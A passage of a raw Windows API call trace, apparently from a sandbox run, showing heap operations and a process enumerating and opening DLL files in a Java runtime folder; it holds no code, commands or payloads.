hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.019] AreFileApisANSI () returned 1 [0091.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76110 [0091.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 54 [0091.019] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e240)) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0091.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.019] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="j2pcsc.dll", cAlternateFileName="")) returned 1 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0091.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0091.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0091.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0091.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0091.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.020] AreFileApisANSI () returned 1 [0091.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll", lpUsedDefaultChar=0x0) returned 50 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0091.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0091.020] AreFileApisANSI () returned 1 [0091.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0091.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46908 [0091.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 50 [0091.020] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.022] GetFileType (hFile=0x418) returned 0x1 [0091.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0091.022] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.022] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.022] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.022] CloseHandle (hObject=0x418) returned 1 [0091.022] AreFileApisANSI () returned 1 [0091.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0091.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x460b8 [0091.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 50 [0091.022] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.023] GetFileType (hFile=0x418) returned 0x1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0091.023] CloseHandle (hObject=0x418) returned 1 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.024] AreFileApisANSI () returned 1 [0091.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46828 [0091.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll") returned 50 [0091.024] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pcsc.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pcsc.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40)) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0091.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.024] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="j2pkcs11.dll", cAlternateFileName="")) returned 1 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0091.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0091.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0091.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0091.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0091.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.025] AreFileApisANSI () returned 1 [0091.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll", lpUsedDefaultChar=0x0) returned 52 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0091.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.025] AreFileApisANSI () returned 1 [0091.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0091.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 52 [0091.025] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.026] GetFileType (hFile=0x418) returned 0x1 [0091.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0091.026] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.026] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.026] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.026] CloseHandle (hObject=0x418) returned 1 [0091.026] AreFileApisANSI () returned 1 [0091.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0091.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 52 [0091.027] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.027] GetFileType (hFile=0x418) returned 0x1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0091.027] CloseHandle (hObject=0x418) returned 1 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 